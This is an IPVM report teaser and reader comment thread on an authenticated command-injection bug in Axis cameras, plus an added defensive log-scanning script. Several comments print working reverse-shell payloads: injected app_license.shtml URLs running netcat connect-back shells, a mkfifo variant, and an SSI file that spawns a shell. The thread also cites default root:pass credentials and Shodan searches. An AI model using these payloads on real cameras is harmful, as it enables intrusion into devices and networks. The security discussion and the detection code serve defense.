Axis OrwellLabs Exploit Tested

By: IPVM Team, Published on Jul 29, 2016

Another exploit has been reported for Axis cameras (OrwellLabs AXIS Authenticated Remote Command Execution), less than a month after Axis critical security vulnerability.

However, we have tested this exploit and it is not of much practical risk. In this report, we explain how the exploit works, demonstrate it in a video screencast, comment on other security issues and contrast to the Bashis exploit we tested.


Comments (22)

While it is not as threatening as the Bashis exploit, it still is a real danger and should have been fixed, as pointed out in the article.

Still too many cameras that I come across have weak/default passwords in them, and then this type of problem can get real.

There's no single measure you can take to make your security waterproof, but I think it's just good practice to take as many as you can in any given circumstances.

If you already know the admin/root password, how dangerous is an exploit that requires the admin/root password? Different story if it is exploitable by a "non privileged user" to gain root privileges... try the exploit as a non-privileged user, to gain higher privileges, that would matter more.. otherwise, login with telnet or ssh instead...

As a follow up, I just tested this "exploit" as a non-privileged user with one Axis cam of mine, and it doesn't work. To this I do understand that Axis would not recognise this as a "vulnerability" in their products.

However, I do agree that it's a bug, and it should be fixed, who knows... this could be exploited in the future by a file permission mistake from Axis' side.

Right now, this so-called "exploit" is bullshit... sorry to say, but for me the report is only noise without substance...

The "exploit" could be compared to "I just hacked my neighbour's vehicle, but I needed to steal the car keys before".

It's not total bullsh**.

Here's a scenario that can be exploited TODAY using this bug.

It's true that to use this you must be root. It's also true that if you are root you can enable ssh.

But just because you can enable ssh doesn't mean you can use ssh remotely. Because the firewall probably isn't open for that port, and changing the port for ssh to 80 would kill the video.

So what cameras are at risk?

All Axis devices that have the default root:pass unchanged and have no remote ssh access because of the firewall.

How many is that?

Also, a reminder that there is common ground here, as you said in the original discussion, which I agree with:

This exploit has no practical use that I can see, as it stands now at least.
The other one on the other hand, is as bad as they get...

I was wrong when I said that it has no practical use, it has at least a small zero-day use.

It's no bashis exploit, but combined with the root:pass vulnerability it gives you a way around the firewall.

This makes it more incomprehensible why it wasn't plugged already.

The main thing is:

You ARE root on the cam.

You CAN do what you want.

Even from the Web GUI.

What's the exploit?

1st

Please tell me, what do you need this "exploit" for if you already know the login/password?

2nd

All Axis cams do force to change the password on first login.

3rd

Yes, if someone put up a cam on the Internet without doing anything, you could actually use the so-called "exploit", please try shodan and see how many you could access with root/pass.

Regarding the exploit, it's complete bullshit, you don't gain anything - you need to be freaking root to use it.

If you could be a "regular user" and gain higher privileges, then I would not disagree.

One thing I would like to dispel is the notion of the "brilliant" self-encapsulated hack as being the sole method of exploit creation.

As often as not, a damaging exploit is really the novel combination of several existing non-critical exploits brought together in a perfect storm to create a critical vulnerability. Like tumblers in a lock falling one by one.

That is why it is essential to fix any unexpected behaviors at once. Because if Axis does not expect them, how can they evaluate the security of the device as a whole?

Although this "exploit" may be of modest utility today, it is still unexpected remote command execution, and I see no reason for Axis to let it persist. If not, make it a feature... :)

Of course Axis needs to fix the bug, one day it may be wrong permissions on the file and the hack could be executed as a non-root user.

But today, the bug requires root to be used.

1st

Please tell me, what do you need this "exploit" for if you already know the login/password?

Because the Axis web interface does not provide a remote shell callback mechanism natively.

2nd

All Axis cams do force to change the password on first login.

Wrong. Older firmware does not. Newer firmware forces you to choose a password; many for nostalgic reasons choose root:pass, because it makes it easier for them. This was a brilliant move on Axis' part as it allowed them to tout their security but allowed integrators who didn't like it to effectively not use it. After all, what's the difference between logging in with root:pass or typing pass:pass the first time?

3rd

Yes, if someone put up a cam on Internet without doing anything, you could actually use the so called "exploit", please try shodan and see how many you could access with root/pass.

I have on numerous occasions, have you really tried?

Finally, I think that this is not a major hole just because you could install a reverse shell as root by knowing the VAPIX API alone and using editfile.cgi etc. to change some startup file, reboot or something. But this is a nice and neat way requiring no knowledge of VAPIX, which is what the script kiddies want.

Your characterization of this hack as "Bullsh**" is unfair.

Mr 2

It's a bug, nothing else. And yes, it should be fixed.

In older firmwares you find plenty of bugs, and sometimes you do find something you can exploit without being logged in. Like bashis' exploit.

But calling something like this an "exploit" that you already need to be root to execute (i.e. you know the login and password for root) to utilise, is wrong "advertising". When you ARE root, you have everything in your hands, and you can do whatever you would like to. Nothing stops you. Not even a remote connect-back shell. It's up to your imagination.

It's complete nonsense to call this a "hack" or even a "vulnerability", it's nothing more than a regular "stolen" root account. Yes, there exists a bug, but to utilise the bug you need to be root. That's the key - root!

IF you were a regular user (let's say 'n00b'), logged in as 'n00b', and gained 'root' privileges with this so-called "exploit", I would agree with the report - but as it is now, no.. I do not. It's no exploit nor hack.

Show me your code to get an interactive shell without cutting the video feed when behind a firewall with only port 80 open.

You have root.

What is open out then? Port 443? Or only port 80 in and out?

You know, there are lots of files that you can tamper with, for instance /etc/crontab or any file in /usr/lib/systemd/system/multi-user.target.wants that easily could load a simple netcat connect-back shell.

That's the minor problem, the major problem is to get in, but please give me your Axis cam IP or Linux computer's IP with root login and password, I will show you my connect-back shell.

Getting out is the minor problem.

How about you just modify your "bull****" statement to something along the lines of:

I don't believe that this exploit creates a real danger to Axis cameras in the wild, since it requires root to run in the first place, and therefore someone would be able to achieve the same result through other methods, even without a simpler remote command execution URL.

Nonetheless, I recognize that finding this unexpected behavior is helpful to security at large, as it could be used as part of another more critical exploit in the future if not identified and patched.

That's the minor problem, the major problem is to get in, but please give me your Axis cam IP....

Ok, camera is a M3006 firmware 6.3x, factory defaulted, credentials set to root:pass. My camera. Port 80 is forwarded.

Say you're still game and I'll publish the address... :)

On this M3006, I can confirm that:

http://192.168.1.1/app_license.shtml?app=ORWELLLABS%3Bnc%20192.168.1.2%2031377%20-e%20/bin/sh

does create a remote shell. There may be other ways, but I don't think any are easier or require less knowledge of Axis architecture.

As for the entirely reasonable suggestions of

You know, there is lots of files that you can tamper with, for instance /etc/crontab or any file in /usr/lib/systemd/system/multi-user.target.wants that easily could load a simple netcat connect back shell.

At least on this M3006, there is no cron or crontab, and the /usr filesystem is read only.
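As an added defender-side example (not code from IPVM, Axis, OrwellLabs or any commenter in this thread), the Python below scans web-server access-log lines for the pattern the thread describes: a request to app_license.shtml whose app parameter, once percent-decoded, contains shell metacharacters. Because the CGI is authenticated, the script also separates a 2xx response (the injected command ran under a valid account) from a 401 (an attempt that failed authentication). The combined log format, the allowlist for application names and the four sample lines are assumptions constructed for this example; the camera's real log format may differ.

```python
"""Flag command-injection attempts against app_license.shtml in access logs.
Added example; log format, allowlist and sample lines are assumptions."""
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed combined-format lines: client, ident, authenticated user,
# timestamp, request line, status, bytes. Not captured from a real camera.
SAMPLE_LOG = """\
10.0.0.5 - root [29/Jul/2016:10:12:01 +0000] "GET /app_license.shtml?app=AXIS_Video_Motion_Detection HTTP/1.1" 200 1843
10.0.0.9 - root [29/Jul/2016:10:12:44 +0000] "GET /app_license.shtml?app=demo%3Bid HTTP/1.1" 200 1843
10.0.0.9 - - [29/Jul/2016:10:13:02 +0000] "GET /app_license.shtml?app=demo;nc%20-w%205%2010.0.0.9%2031337 HTTP/1.1" 401 0
10.0.0.5 - root [29/Jul/2016:10:13:30 +0000] "GET /axis-cgi/param.cgi?action=list HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed allowlist: an application name is a plain token. Anything else
# in the app parameter is treated as an injection attempt.
ALLOWED_APP = re.compile(r'^[A-Za-z0-9_.-]*$')
# Characters that would terminate or extend a shell command.
SHELL_META = set(';|&`$<>\n')


def fully_decode(value, limit=3):
    """Percent-decode repeatedly so a double-encoded ';' is still seen."""
    for _ in range(limit):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def app_params(target):
    """Decoded 'app' values from a request to app_license.shtml, else []."""
    parts = urlsplit(target)
    if not parts.path.endswith('/app_license.shtml'):
        return []
    values = []
    # Split on '&' only: a raw ';' inside the value is part of the
    # payload, not a parameter separator.
    for pair in parts.query.split('&'):
        key, _, val = pair.partition('=')
        if unquote_plus(key) == 'app':
            values.append(fully_decode(val))
    return values


def classify(line):
    """Return a finding dict for an injection attempt, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for app in app_params(m.group('target')):
        if ALLOWED_APP.match(app):
            continue
        status = int(m.group('status'))
        return {
            'client': m.group('client'),
            'user': m.group('user'),
            'status': status,
            'app': app,
            'shell_meta': sorted(set(app) & SHELL_META),
            # The CGI is authenticated: a 2xx means the injected command ran
            # under a valid account; anything else is a failed attempt.
            'outcome': 'executed' if 200 <= status < 300 else 'attempted',
        }
    return None


def scan(log_text):
    """All findings for a block of log text, in file order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run over the constructed lines, the benign application name and the unrelated param.cgi request are ignored, the percent-encoded `;id` by an authenticated root user is reported as executed, and the raw `;nc` attempt that got a 401 is reported as attempted; the user field is what makes this useful for the thread's point, since an "executed" finding under root means the credentials were already known.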

Remember now, we have already logged in to the cam as root, so below are no 0-day exploits… (only stupid code)

Maybe your "nc" doesn't have the "-e" option, try this instead:

http://192.168.1.1/app_license.shtml?app=;mkfifo%20/tmp/s;nc%20-w%205%20192.168.1.2%2031337%200%3C/tmp/s|/bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s

The equivalent could be executed by adding this small piece of code in /usr/html/local.

# cat /usr/html/local/back.shtml
<!--#include virtual="/incl/top_incl.shtml" -->
<!--#exec cmd="mkfifo /tmp/s;nc -w 5 $ip$ $port$ 0</tmp/s|/bin/sh>/tmp/s 2>/tmp/s; rm /tmp/s" -->
<!--#include virtual="/incl/bottom_incl.shtml" -->

Call with:

http://192.168.1.1/local/back.shtml?ip=192.168.1.2&port=31337

Maybe your nc doesn't have the -e option.

It's not my nc, it's Axis' chosen busybox nc build.

Do you find the dummy version of nc (without -l) out there a lot?

The named pipes are nice in a pinch though.

So, the Orwell guy found an easy way to execute a command, without even creating a file. It's just a little thing but why give him such a hard time?

Whatever, I'm out of this thread now..

Ok, have a good one!

p.s. have you ever set up a reverse http using fifo and 4 nc processes?

like in the case when you can only connect out from the camera but wish to browse the web server remotely?

Geez, I feel bad for all these Axis partners who have to disclose all these exploits to their customers and explain why they should risk their networks!
